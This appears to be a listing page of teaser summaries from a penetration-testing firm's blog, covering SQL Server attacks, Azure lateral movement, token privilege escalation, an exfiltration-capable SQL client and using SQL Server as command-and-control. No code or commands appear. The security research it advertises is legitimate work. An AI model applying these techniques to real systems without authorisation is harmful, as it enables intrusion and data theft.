Lateral Movement in Azure App Services
We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we’re running into more instances of applications being run on Azure App Services. Whenever we run into an App Services application with a serious vulnerability, I’ll frequently get a ping asking about next steps to […]
Evil SQL Client Console: Msbuild All the Things
Evil SQL Client (ESC) is an interactive .net SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities.
Exploiting SQL Server Global Temporary Table Race Conditions
This blog will walk through how to find and exploit SQL Server global temporary table race conditions to gain unauthorized access to data and execute code.
Bypassing SQL Server Logon Trigger Restrictions
This shows how to bypass SQL Server logon trigger restrictions by spoofing hostnames and application names using lesser known connection string properties.
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
Tokenvator: A Tool to Elevate Privilege using Windows Tokens WheresMyImplant is a mini red team toolkit that I have been developing over the past year in .NET. While developing and using it, I found that I consistently needed to alter my process access token to do such things as SYSTEM permissions or add debug privileges […]
Databases and Clouds: SQL Server as a C2
This blog will provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2.
Attacking Application Specific SQL Server Instances
This blog walks through how to quickly identify SQL Server instances used by 3rd party applications that are configured with default passwords using PowerUpSQL.
Identifying Payment Cards at Rest – Going Beyond the Key Word Search
In this blog, I’ll be discussing an approach for locating payment card numbers stored in MSSQL databases without relying on key words for data discovery. To overcome the impracticality of pulling an entire database over the wire for advanced analysis, we’ll focus on using MSSQL’s native capability to filter out items that can’t contain cardholder […]
Attacking SQL Server CLR Assemblies
In this blog, I’ll be expanding on the CLR assembly attacks developed by Lee Christensen and covered in Nathan Kirk’s CLR blog series. I’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. I’ll also share a few new PowerUpSQL […]